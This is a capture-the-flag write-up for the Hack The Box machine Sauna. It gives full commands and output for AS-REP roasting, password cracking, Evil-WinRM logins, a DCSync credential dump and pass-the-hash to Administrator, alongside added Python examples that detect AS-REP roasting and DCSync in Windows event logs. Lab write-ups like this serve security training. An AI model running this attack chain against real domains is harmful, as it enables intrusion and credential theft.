This is a detailed walk-through for sauna.htb written by dR1PPy
The challenges presented by Sauna walk the line between CTF and Real World very well.
It felt good to spend a day roasting in the Sauna while sharpening the Windows attack skills.
As always a big shout out to the machine creator egotisticalSW. It’s friends like you that help keep these challenges fun.
Enumeration
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.10.175 53 tcp domain open
10.10.10.175 53 udp domain open
10.10.10.175 88 tcp kerberos-sec open Microsoft Windows Kerberos server time: 2020-03-18 06:48:07Z
10.10.10.175 123 udp ntp open
10.10.10.175 135 tcp msrpc open Microsoft Windows RPC
10.10.10.175 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.10.175 389 tcp ldap open Microsoft Windows Active Directory LDAP Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.175 389 udp ldap open
10.10.10.175 445 tcp microsoft-ds open
10.10.10.175 464 tcp kpasswd5 open
10.10.10.175 593 tcp ncacn_http open Microsoft Windows RPC over HTTP 1.0
10.10.10.175 636 tcp tcpwrapped open
10.10.10.175 3268 tcp ldap open Microsoft Windows Active Directory LDAP Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name
10.10.10.175 3269 tcp tcpwrapped open
10.10.10.175 9389 tcp mc-nmf open .NET Message Framing
10.10.10.175 49667 tcp msrpc open Microsoft Windows RPC
10.10.10.175 49673 tcp ncacn_http open Microsoft Windows RPC over HTTP 1.0
10.10.10.175 49674 tcp msrpc open Microsoft Windows RPC
10.10.10.175 49675 tcp msrpc open Microsoft Windows RPC
10.10.10.175 49686 tcp msrpc open Microsoft Windows RPC
10.10.10.175 49695 tcp msrpc open Microsoft Windows RPC
During our enumeration we find a possible user.
|_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
We try the Impacket GetNPUsers pre-authentication script and are able to validate the username format.
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
No entries found!
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/hsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Cannot authenticate hsmith, getting its TGT
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/hugo -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Cannot authenticate hugo, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Using this same username format we test the other possible users found on the webpage.
Doing this we also find the valid username 'fsmith', which provides us an AS-REP hash.
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0f109c4e7446bdd44ca5b0dc8fb903e9$520e39a3a6065b8a5a8bc691d94e2b377e397bef2a9f2d316f3fd6f7410bfa0813bcc681bf901546d0dc0b77718ebc8cbbb8988793c60da4a05899463e7cc4af9d85f5b87df00766ab0590060a4dbfde88c5bd8b78e660eb64a929a1c701b675dc19166ec45e7e6a3af8e95e9576d9c4b9e1e12c25fe9f885e67aa2630af52864827238a693a7c2b516174cd726b801192a93bfc4dccf9db0c70d77f8f6be434bc733a0d4cc9c320980290a339413fd5b48df3730fe2650866787361057a2d2a95fa08e5ab1bbf0d1c214379131d4ab97edcb51f12bd8377b70dad50196b9434e33772b41f1b8b1b7ccb9bad7198e37fca0d369258e869083e2463a749e10376
hashcat -m 18200 --force -a 0 fsmith-hash.txt /TOOL/rockyou.txt --show
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0f109c4e7446bdd44ca5b0dc8fb903e9$520e39a3a6065b8a5a8bc691d94e2b377e397bef2a9f2d316f3fd6f7410bfa0813bcc681bf901546d0dc0b77718ebc8cbbb8988793c60da4a05899463e7cc4af9d85f5b87df00766ab0590060a4dbfde88c5bd8b78e660eb64a929a1c701b675dc19166ec45e7e6a3af8e95e9576d9c4b9e1e12c25fe9f885e67aa2630af52864827238a693a7c2b516174cd726b801192a93bfc4dccf9db0c70d77f8f6be434bc733a0d4cc9c320980290a339413fd5b48df3730fe2650866787361057a2d2a95fa08e5ab1bbf0d1c214379131d4ab97edcb51f12bd8377b70dad50196b9434e33772b41f1b8b1b7ccb9bad7198e37fca0d369258e869083e2463a749e10376:Thestrokes23
ldapsearch -LLL -x -H ldap://sauna.htb -b '' -s base '(objectclass=*)'
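The AS-REP roasting and username probing above leave a clear trail on the domain controller. The following is an added defender-side example (not part of the original write-up) that audits userAccountControl for the DONT_REQUIRE_PREAUTH bit and runs detection logic over constructed Security event 4768 records; the account values, IPs and event fields are constructed samples, not data from this box.

```python
"""Audit and detection for AS-REP roasting (added example; constructed data)."""
from collections import Counter

UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit (MS-ADTS)
RC4_HMAC = 0x17                      # etype 23, the format hashcat mode 18200 cracks
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # 4768 failure code for a non-existent user

# Constructed sAMAccountName -> userAccountControl; FSmith mirrors the box's state.
SAMPLE_ACCOUNTS = {"HSmith": 0x10200, "FSmith": 0x410200, "svc_loanmgr": 0x10200}

# Constructed Security event 4768 (TGT requested) records; 10.0.0.99 is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "IpAddress": "10.0.0.99",
     "PreAuthType": 0, "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "hsmith", "IpAddress": "10.0.0.99",
     "PreAuthType": 0, "TicketEncryptionType": 0xFFFFFFFF, "Status": "0x19"},
    {"EventID": 4768, "TargetUserName": "hugo", "IpAddress": "10.0.0.99",
     "PreAuthType": 0, "TicketEncryptionType": 0xFFFFFFFF, "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN},
    {"EventID": 4768, "TargetUserName": "hugosmith", "IpAddress": "10.0.0.99",
     "PreAuthType": 0, "TicketEncryptionType": 0xFFFFFFFF, "Status": KDC_ERR_C_PRINCIPAL_UNKNOWN},
    {"EventID": 4768, "TargetUserName": "Administrator", "IpAddress": "10.0.0.7",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": "0x0"},
]

def accounts_without_preauth(accounts):
    """Audit: account names whose UAC has DONT_REQUIRE_PREAUTH set (roastable)."""
    return sorted(n for n, uac in accounts.items() if uac & UF_DONT_REQUIRE_PREAUTH)

def asrep_roast_hits(events):
    """Detect: TGTs issued with no pre-auth and RC4, the fingerprint GetNPUsers leaves."""
    hits = Counter()
    for ev in events:
        if (ev["EventID"] == 4768 and ev["Status"] == "0x0"
                and ev["PreAuthType"] == 0 and ev["TicketEncryptionType"] == RC4_HMAC):
            hits[(ev["TargetUserName"], ev["IpAddress"])] += 1
    return dict(hits)

def principal_enum_sources(events, min_failures=2):
    """Detect: IPs with repeated 'client not found' failures (username guessing)."""
    per_ip = Counter(ev["IpAddress"] for ev in events
                     if ev["EventID"] == 4768 and ev["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in per_ip.items() if n >= min_failures}

if __name__ == "__main__":
    print("no-preauth accounts:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("AS-REP roast hits:", asrep_roast_hits(SAMPLE_EVENTS))
    print("enumeration sources:", principal_enum_sources(SAMPLE_EVENTS))
```

Clearing the DONT_REQUIRE_PREAUTH bit on FSmith and enforcing AES-only Kerberos removes the roastable hash entirely; the 4768 filters give a signal where that is not yet done.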
Gaining Access
To validate our credentials we try to dump the AD info.
python GetADUsers.py -all EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip sauna.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
Password:
[*] Querying sauna.htb for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2020-01-24 10:14:15.321116 2020-02-10 09:16:17.478519
Guest <never> <never>
krbtgt 2020-01-22 22:45:30.587720 <never>
HSmith 2020-01-22 22:54:34.140321 <never>
FSmith 2020-01-23 09:45:19.047096 2020-03-18 20:31:24.039258
svc_loanmgr 2020-01-24 16:48:31.678079 <never>
OK, it looks like we have all we need to get our shell.
evil-winrm -i sauna.htb -u fsmith -p Thestrokes23 -s '/var/www/html/win' -e '/var/www/html/win/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
Escalating Privileges
We copy over WinPEAS.bat to help us with enumeration.
After reviewing the output we notice the following.
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
From our previous AD dump we noted the actual username as 'svc_loanmgr', so we connect back with our new user.
evil-winrm -i sauna.htb -u svc_loanmgr -p Moneymakestheworldgoround! -s '/var/www/html/win' -e '/var/www/html/win/'
Now we have another set of credentials to leverage. But how?
After spending some time on standard enumeration we decided to just try stealing tokens directly.
Eventually we find we can use secretsdump.py from the Impacket toolkit to extract the domain user hashes.
./secretsdump.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175 -just-dc
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:d7f0c9f6fe1513213f825b3793e647ae:::
[*] Kerberos keys grabbed
[*] Cleaning up...
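The "DRSUAPI method" line in the secretsdump output is the tell: the service account replicated the directory like a domain controller would. The following is an added defender-side example (not part of the original write-up) that flags Security event 4662 records in which a non-DC principal exercises the replication extended rights; the event records are constructed samples, and SAUNA$ is taken from the dump above as the only legitimate replicating account.

```python
"""Detect DCSync-style replication from Security event 4662 (added example)."""
import re

# Extended-right GUIDs that directory replication requires (well-known, fixed values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is exercised

# Constructed 4662 records; "%%7688" is how the raw event spells "Control Access".
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "ObjectType": "domainDNS",
     "AccessMask": "0x100",
     "Properties": "%%7688\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "ObjectType": "domainDNS",
     "AccessMask": "0x100",
     "Properties": "%%7688\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "FSmith", "ObjectType": "user",
     "AccessMask": "0x10",
     "Properties": "%%7685\r\n\t{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

def replication_rights_used(event):
    """Names of the replication extended rights referenced by one 4662 record."""
    if event.get("EventID") != 4662 or not int(event["AccessMask"], 16) & CONTROL_ACCESS:
        return []
    guids = {g.lower() for g in GUID_RE.findall(event["Properties"])}
    return sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())

def dcsync_suspects(events, domain_controllers=("SAUNA$",)):
    """(subject, rights) for replication requests not made by a known DC account."""
    suspects = []
    for ev in events:
        rights = replication_rights_used(ev)
        if rights and ev["SubjectUserName"] not in domain_controllers:
            suspects.append((ev["SubjectUserName"], rights))
    return suspects

if __name__ == "__main__":
    for subject, rights in dcsync_suspects(SAMPLE_4662):
        print(f"DCSync suspect: {subject} used {', '.join(rights)}")
```

The same rights show up in the domain object's ACL, so auditing which non-DC principals hold them is the preventive check; svc_loanmgr holding them is what made this dump possible.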
Now that we have the Administrator NT hash we use the wmiexec shell to get our flag.
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users\Administrator\Desktop
C:\users\Administrator\Desktop>type root.txt
And now we can leave the sauna nice and roasted.
Thanks for Playing Today!
Resources
Sauna.htb
https://www.hackthebox.eu/home/machines/profile/229